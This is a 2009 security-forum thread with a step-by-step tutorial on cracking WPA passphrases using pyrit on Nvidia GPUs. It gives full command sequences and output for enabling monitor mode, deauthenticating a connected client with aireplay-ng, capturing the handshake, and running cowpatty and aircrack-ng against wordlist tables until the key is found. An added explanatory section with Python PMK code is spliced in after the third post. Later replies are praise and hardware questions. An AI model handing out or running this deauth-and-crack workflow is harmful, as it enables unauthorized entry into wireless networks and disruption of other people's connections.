Remote Exploit Forums

#1
Old 02-11-2009, 12:02 AM
pureh@te's Avatar
Jenkem Addict
 
Join Date: Mar 2007
Location: /dev/null
Posts: 5,549
Default pyrit CUDA nvidia Tutorial + Nvidia overclock instructions

OK so here we are with a fresh new release and, people, let's be honest, we want to see something new. Well, this is one of BT4's new exciting features.

WPA hash table generation using CUDA/nvidia GPU power.

First thing to do is check if your card is supported for this technology: http://en.wikipedia.org/wiki/CUDA#Supported_GPUs

So let's get started....

I'm going to assume that if you're reading this you have no clue what you're doing, so I will try to go from A to Z on this.

So let's boot our disk and when we get to the framebuffer console prompt (that's before you startx) we are going to install the nvidia kernel module.
Code:
root@bt:~# cd /opt/cuda/
root@bt:/opt/cuda# ls
CUDA_INSTALL  cuda-set-env.sh  nv_20090130-1_i386.deb
root@bt:/opt/cuda# bash CUDA_INSTALL
You will get some output and then you will be asked to overwrite your current xorg.conf. Take the default here which is no.
Next let's install the driver.
Code:
root@bt:~# modprobe nvidia
root@bt:~# depmod -a
OK so that's done. Now since we've totally borked our xorg.conf we should generate a new one.
Code:
root@bt:~# X -configure
That will save the new one in /root and we will have to copy it over by hand.
Code:
root@bt:~# cp xorg.conf.new  /etc/X11/xorg.conf
At this point we should be able to either startx or use the new bt4-crystal window manager. (shameless plug for me and j0rgan here)

OK so if everything went well you are looking at your desktop.

Now before we get to cracking pyrit has a benchmark utility we can use to see if we are good to go.
Code:
root@bt:/pentest/password/pyrit# python pyrit.py benchmark
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

The ESSID-blobspace seems to be empty; you should create an ESSID...
Available cores: 'Standard CPU', 'Nvidia CUDA'
Testing CPU-only core 'Standard CPU' (4 CPUs)...  1294.58 PMKs/s

Testing GPU core 'Nvidia CUDA' (Device 'GeForce 8800 GT')...  5409.43 PMKs/s
As you can see my 8800GT is roughly 5 times faster than my Q6600 quad core chip running at 3.6 GHz.

OK swell, so that works. Now what we need is a .cap file. I'm assuming everyone can do this but I will show it anyway.
Code:
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~# airodump-ng -w cudacapture mon0
OK so let's do a little scan of my house.


As you can see I have 2 dd-wrt routers on at the moment and my wife is connected to ddwrt1 feeding her new facebook addiction.
Lets deauth her a$$
Code:
root@bt:~# aireplay-ng -0 10 -a 00:1d:7e:f0:a5:8f -c 00:13:02:a7:dd:53 mon0
01:13:28  Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
01:13:29  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
01:13:30  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
01:13:31  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:32  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:33  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
01:13:34  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:35  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:36  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
01:13:37  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
01:13:38  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
Now lets check for success
Code:
root@bt:~# aircrack-ng cudacapture-01.cap
Opening cudacapture-01.cap
Read 5612 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
   2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
   3  00:21:29:84:11:FD  CookNet                   WEP (34 IVs)
   4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
   5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
   6  00:1A:70:83:B0:1C  linksys                   None (0.0.0.0)
   7  00:13:46:44:A5:CE  default                   WEP (11 IVs)
   8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
   9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
  10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
  11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
  12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)

Index number of target network ?
Looks like we got one.
I'm going to start a new post for part 2

Last edited by pureh@te; 04-23-2009 at 09:42 PM.
#2
Old 02-11-2009, 12:45 AM
pureh@te's Avatar
Jenkem Addict
 
Join Date: Mar 2007
Location: /dev/null
Posts: 5,549
Default pyrit CUDA nvidia Tutorial part 2

Okay so we got a handshake, now what?

First off we need to grab a dictionary file.
Code:
root@bt:~# wget http://www.outpost9.com/files/wordlists/dic-0294.zip
--2009-02-11 01:17:53--  http://www.outpost9.com/files/wordlists/dic-0294.zip
Resolving www.outpost9.com... 12.180.200.208
Connecting to www.outpost9.com|12.180.200.208|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3283473 (3.1M) [application/zip]
Saving to: `dic-0294.zip'

100%[=============================================================================================================>] 3,283,473    268K/s   in 9.2
root@bt:~# unzip dic-0294.zip 
Archive:  dic-0294.zip          
  inflating: dic-0294.txt
Then we need to strip out the stuff we don't need.
Code:
root@bt:~# cat dic-0294.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.lst
root@bt:~# wc -l wpa.lst 
597532 wpa.lst
So about six hundred thousand words.

Now we got a file to work with. Now for the fun part.
Code:
root@bt:~# cd /pentest/password/pyrit/
root@bt:/pentest/password/pyrit#
Add our ESSID

Code:
root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 create_essid
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Created ESSID 'ddwrt1'
Import our new wpa list

Code:
root@bt:/pentest/password/pyrit# python pyrit.py -f /root/wpa.lst import_passwords
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Importing from  '/root/wpa.lst'
597532 lines read. All done.
And start the table generation

Code:
root@bt:/pentest/password/pyrit# python pyrit.py batchprocess
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Using default core 'Nvidia CUDA' (Device 'GeForce 8800 GT')
Working on ESSID 'ddwrt1'
Reading unit '1ec5841a057928e33972489b461cb914' (54072 passwords buffered)  
 All done, computed 54072 PMKs in 10.47 seconds, 5164.13 PMKs/s)
Reading unit '6c9303c848ed6a4473221229d4387934' (54996 passwords buffered)  
 All done, computed 54996 PMKs in 10.79 seconds, 5099.30 PMKs/s)
Reading unit '70ded804144475dbc58b982625483821' (56076 passwords buffered)  
 All done, computed 56076 PMKs in 10.74 seconds, 5223.29 PMKs/s)...

...Reading unit 'f384ca460307a079503db313ece6806e' (53808 passwords buffered)  
 All done, computed 53808 PMKs in 10.67 seconds, 5044.67 PMKs/s)
Reading unit '1bf464713cab79da5efc8503e8f28812' (17496 passwords buffered) 
 All done, computed 17496 PMKs in 3.23 seconds, 5422.30 PMKs/s)

Batchprocessing done.
So if everything went well you are at this point. Pyrit has the ability to output to cowpatty or airolib-ng files. For the sake of this tutorial I will be using cowpatty because I've found its faster.

So let's make our cowpatty file
Code:
root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f cow.out export_cowpatty
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Exporting to 'cow.out'...
4656218 entries written. All done.
Okay so let's see how fast this will go.
Code:
root@bt:~# cd /pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty/
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ls
AUTHORS    COPYING     cowpatty.h  eap-test.dump  fpga.c  genpmk.c  Makefile  md5.o       sha1.c  TODO     utils.o
CHANGELOG  cowpatty    cowpatty.o  FAQ            fpga.o  genpmk.o  md5.c     radiotap.h  sha1.h  utils.c  wpa2psk-linksys.dump
common.h   cowpatty.c  dict        file_magic     genpmk  INSTALL   md5.h     README      sha1.o  utils.h  wpapsk-linksys.dump
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty
cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
cowpatty: Must supply a list of passphrases in a file with -f or a hash file
          with -d.  Use "-f -" to accept words on stdin.

Usage: cowpatty [options]

        -f      Dictionary file
        -d      Hash file (genpmk)
        -r      Packet capture file
        -s      Network SSID (enclose in quotes if SSID includes spaces)
        -F card Use FPGA acceleration
        -h      Print this help information and exit
        -v      Print verbose information (more -v for more verbosity)
        -V      Print program version and exit

root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -d /pentest/password/pyrit/cow.out -s ddwrt2 -r /root/cudacapture-01.cap
cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 1000: Mathboldit1
key no. 2000: llegando2
key no. 3000: shougakukan123
key no. 4000: DISGUISING
key no. 5000: Graffaloy
key no. 6000: Passibleness123
key no. 7000: Unmaking2
key no. 8000: Procanal123
So this is the cracking process.......

Code:
4656217 passphrases tested in 24.84 seconds:  187468.86 passphrases/second
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty#
And just to show you what it would be like without the hash file..

Code:
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -f /root/wpa.lst -s ddwrt2 -r /root/cudacapture-01.cap

27824 passphrases tested in 84.98 seconds:  327.40 passphrases/second
That's a HUGE difference

Last edited by pureh@te; 02-11-2009 at 12:57 AM.
#3
Old 02-11-2009, 01:03 AM
pureh@te's Avatar
Jenkem Addict
 
Join Date: Mar 2007
Location: /dev/null
Posts: 5,549
Default pyrit CUDA nvidia Tutorial part 3

So you would rather use the airolib-ng option because you love aircrack. That can be done as well, like this..

Back up to right before we created the cow.out table and use these commands instead.

Create the database (pyrit won't do it for you for some reason)
Code:
root@bt:/pentest/password/pyrit# airolib-ng testdb -import essid ddwrt1 
Database <testdb> does not already exist, creating it...
Database <testdb> sucessfully created
Could not open file/stream for reading.
Then output to our newly created database.

Code:
root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f testdb export_hashdb
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Exporting ESSID 'ddwrt1'
Okay.. this takes a little longer than the cowpatty tables due to SQL stuff, but the advantage to airolib-ng is it can use HUGE files, while I think cowpatty fails with hash files over 2 gigs.

Once it's done we can use aircrack
Code:
root@bt:/pentest/password/pyrit# aircrack-ng -r testdb /root/cudacapture-01.cap 
Opening /root/cudacapture-01.cap
Read 10561 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
   2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
   3  00:21:29:84:11:FD  CookNet                   WEP (93 IVs)
   4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
   5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
   6  00:1A:70:83:B0:1C  linksys                   None (192.168.1.1)
   7  00:13:46:44:A5:CE  default                   WEP (28 IVs)
   8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
   9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
  10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
  11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
  12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)
  13  00:18:3A:3A:B2:B5                            No data - WEP or WPA
  14  00:12:0E:6E:FE:6B  WEST3306                  No data - WEP or WPA

Index number of target network ? 1
Select the network and let her rip

Code:
                                 Aircrack-ng 1.0 rc2 r1385


                   [00:00:38] 4315315 keys tested (112595.70 k/s)


                          KEY FOUND! [ metasploit ]


      Master Key     : F4 AB C6 2A 18 F8 89 9B 6A 70 3D 5F EB 0D F4 F9 
                       F8 F8 51 48 25 3E C3 61 EA 54 17 3D D3 84 18 AC 

      Transient Key  : 11 A0 36 8F 96 63 64 7F 63 A1 08 35 73 82 96 AE 
                       49 E1 BE 68 F7 7E 8D 98 57 28 C2 E1 DE AC F2 AC 
                       68 00 43 B9 88 8E 96 57 7A BF E2 62 DB DE 6A 1B 
                       BF 53 10 26 D1 D8 32 47 BC A6 F5 86 F1 83 23 11 

      EAPOL HMAC     : 68 AE A8 82 57 7C 3D 89 6E BC BD C1 46 8E 34 AD 


Quitting aircrack-ng...
Well, that's IT! Thanks for listening/reading.

Last edited by pureh@te; 02-11-2009 at 01:46 AM.
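What parts 2 and 3 above are really doing (pyrit's batchprocess, and the cowpatty/airolib-ng tables it exports) is precomputing one WPA-PSK Pairwise Master Key per candidate passphrase for a single ESSID. The following Python is an added example, not code from the thread or from pyrit, cowpatty or airolib-ng: it redoes that arithmetic on a small constructed wordlist so you can see why a table lookup is so much faster than the `-f` dictionary run, and why a table built for one ESSID is useless against a network with a different name. The wordlist `SAMPLE_WORDS`, the ESSIDs used, and the helper names are assumptions made for the example; the one known-answer value comes from the IEEE 802.11 PSK test vectors.

```python
# Added example, not code from the thread or from pyrit/cowpatty/airolib-ng.
# Reproduces the PMK arithmetic those tools perform for one ESSID, on a
# constructed wordlist, to show why a precomputed table is fast and why it is
# tied to a single ESSID.
import hashlib
from typing import Dict, Iterable, Iterator, Optional

# Passphrase length bounds that `pw-inspector -m 8 -M 63` enforces in the thread.
WPA_MIN, WPA_MAX = 8, 63


def pmk(passphrase: str, essid: str) -> bytes:
    """WPA-PSK Pairwise Master Key: PBKDF2-HMAC-SHA1 over the passphrase, salted
    with the ESSID, 4096 iterations, 256-bit output. This is the expensive step
    pyrit precomputes on the GPU and cowpatty/aircrack then read from the table."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), 4096, dklen=32)


def wpa_filter(words: Iterable[str]) -> Iterator[str]:
    """Same effect as `sort | uniq | pw-inspector -m 8 -M 63`: drop duplicates
    and anything outside the 8..63 character range WPA accepts."""
    seen = set()
    for word in words:
        word = word.rstrip("\r\n")
        if WPA_MIN <= len(word) <= WPA_MAX and word not in seen:
            seen.add(word)
            yield word


def build_table(essid: str, words: Iterable[str]) -> Dict[bytes, str]:
    """What `pyrit batchprocess` does for one ESSID: one PMK per candidate,
    keyed by PMK so a capture can be matched without redoing PBKDF2."""
    return {pmk(word, essid): word for word in wpa_filter(words)}


def lookup(table: Dict[bytes, str], candidate_pmk: bytes) -> Optional[str]:
    """A table hit is a plain dictionary lookup; a miss returns None."""
    return table.get(candidate_pmk)


# Constructed sample wordlist (assumption for the example; not the dic-0294 list).
SAMPLE_WORDS = ["short", "password", "metasploit", "password",
                "correct horse battery staple", "a" * 64]

if __name__ == "__main__":
    # Known-answer check: IEEE 802.11 test vector, passphrase "password", SSID "IEEE".
    assert pmk("password", "IEEE").hex() == \
        "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    table = build_table("ddwrt1", SAMPLE_WORDS)
    print(f"{len(table)} PMKs computed for ESSID ddwrt1")
    # A table built for ddwrt1 matches a ddwrt1 PMK ...
    print("ddwrt1 hit:", lookup(table, pmk("metasploit", "ddwrt1")))
    # ... but says nothing about the same passphrase on a differently named network.
    print("ddwrt2 hit:", lookup(table, pmk("metasploit", "ddwrt2")))
```

The 4096-iteration PBKDF2 in `pmk` is the whole cost of the `-f` dictionary run; once the table exists, matching a capture is a hash lookup, which is the gap between the ~327 and ~187,000 passphrases per second shown above. The same property is the defender's lever: a table is only valid for the exact ESSID it was generated for, so a non-default network name forces an attacker back to computing every PMK from scratch, and a long random passphrase keeps it out of any wordlist to begin with.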
#4
Old 02-11-2009, 02:03 AM
=Tron='s Avatar
Senior Member
 
Join Date: Apr 2008
Location: The land of a thousand lakes
Posts: 2,035
Default

Beautiful! Thank you for the write up, this is one of the features that I really hoped would be incorporated into BT4.
__________________
-Monkeys are like nature's humans.
#5
Old 02-11-2009, 05:51 AM
Barry's Avatar
Senior Member
 
Join Date: Feb 2006
Location: Right behind you. Using you as a shield.
Posts: 3,311
Default

Dude, that's cool. Now figure out how to use all your nvidia cards in your SuperAwesomeSuperComputer at the same time.
#6
Old 02-11-2009, 07:34 AM
Senior Member
 
Join Date: Jun 2008
Posts: 100
Default

Wonderful starting point for BT4 Beta!! Shame on me for not having an Nvidia card to test it out. I used to get 10,000 k/s with a pre-hashed airolib database; what you are getting is just insane.
__________________
QuadCore AMD Phenom X4 9950, 2600 MHz
8GB DDR2 800MHz
Dual Boot System: Windows Server 2008 x64 w/ Hyper-V, Ubuntu 9.10 x64
#7
Old 02-11-2009, 07:37 AM
Barry's Avatar
Senior Member
 
Join Date: Feb 2006
Location: Right behind you. Using you as a shield.
Posts: 3,311
Default

Quote:
Originally Posted by adri_ht_ View Post
Wonderful starting point for BT4 Beta!! Shame on me for not having an Nvidia card to test it out. I used to get 10,000 k/s with a pre-hashed airolib database; what you are getting is just insane.
Heh, I don't even have a computer that's compatible (or new enough) with the nvidia cards that work with pyrit.....
#8
Old 02-11-2009, 10:30 AM
kidFromBigD's Avatar
Senior Member
 
Join Date: Aug 2007
Posts: 130
Default

Quote:
Originally Posted by pureh@te View Post
Lets deauth her a$$
...My favorite quote from your tutorial.

Thanks for posting this. Yes, it is time to upgrade my hardware to something that takes advantage of the GPU power. I'd like to see follow-up posts from other members with GTX-200 series cards. Those numbers should be off the charts.
#9
Old 02-11-2009, 12:16 PM
Junior Member
 
Join Date: Jan 2008
Posts: 7
Default

Does this mean if my MB has a built-in ATI graphics chip it will not work? I do have an nvidia 6600 series card lying around, will it work?
#10
Old 02-11-2009, 12:23 PM
pureh@te's Avatar
Jenkem Addict
 
Join Date: Mar 2007
Location: /dev/null
Posts: 5,549
Default

The onboard card shouldn't matter. If you have an nvidia card in the PCI slot it should get detected. Some of the newer nvidia stuff doesn't even have VGA outs, it's only for computing.

Like this one I'm saving up for...

http://www.nvidia.com/object/product..._c1060_us.html


You can check for your card here

http://en.wikipedia.org/wiki/CUDA#Supported_GPUs